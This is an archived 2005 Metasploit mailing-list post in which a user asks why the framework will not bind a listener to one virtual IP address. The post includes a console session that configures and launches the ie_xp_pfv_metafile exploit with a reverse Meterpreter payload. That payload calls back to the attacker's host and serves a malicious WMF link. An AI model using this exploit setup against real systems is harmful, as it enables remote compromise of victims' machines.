Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Binding to local virtual address problem.

From: rrecaba at usb.ve (rrecaba at usb.ve)
Date: Thu, 29 Dec 2005 23:47:50 -0400 (VET)

My setup is a linux box fedora core 2, three virtual interfaces, perl
v5.8.3, framework 2.5.

[root at u15192744 root]# netstat -plan |grep :4321
[root at u15192744 root]# netstat -plan |grep :1863
tcp        0      0 AA.BBB.177.93:1863      0.0.0.0:*               LISTEN      5776/sockd
[root at u15192744 root]#

So I have only one app bound to one virtual address port 1863, and nothing
bound to port 4321 on any address. The framework seems to try to local
bind to ALL IP addresses even though i am specifying only one with LHOST
and LPORT. Therefore, it tells me address is in use when i try to use port
1863 of a different IP address, even though it really isnt used at all!.
IP addresses are all virtual (i.e. eth0, eth0:1, eth0:2). It only accepts
ports that are not used by ANY IP address at all! (frustration)

msf ie_xp_pfv_metafile(win32_reverse_meterpreter) > show options

Exploit and Payload Options
===========================

  Exploit:    Name        Default          Description
  --------    --------    -------------    ----------------------------
  optional    HTTPHOST    AA.BBB.177.93    The local HTTP listener host
  required    HTTPPORT    8080             The local HTTP listener port

  Payload:    Name        Default                                                       Description
  --------    --------    -----------------------------------------------------         
------------------------------------------
  required    EXITFUNC    seh                                                           Exit technique: "process", 
"thread", "seh"
  required    LHOST       AA.BBB.167.144                                                Local address to receive 
connection
  required    METDLL      /home/dump/framework-2.5//data/meterpreter/metsrv.dll         The full path the meterpreter 
server dll
  required    LPORT       1863                                                          Local port to receive connection

  Target: Automatic - Windows XP / Windows 2003

msf ie_xp_pfv_metafile(win32_reverse_meterpreter) > exploit
Error: Could not start listener: Address already in use
msf ie_xp_pfv_metafile(win32_reverse_meterpreter) > set LPORT 4321
LPORT -> 4321
msf ie_xp_pfv_metafile(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://AA.BBB.177.93:8080/anything.wmf
[*] Exiting Reverse Handler.
msf ie_xp_pfv_metafile(win32_reverse_meterpreter) >

What am i doing wrong??

Any help would be greatly appreciated.
Previous By Date Next
Previous By Thread Next

Current thread: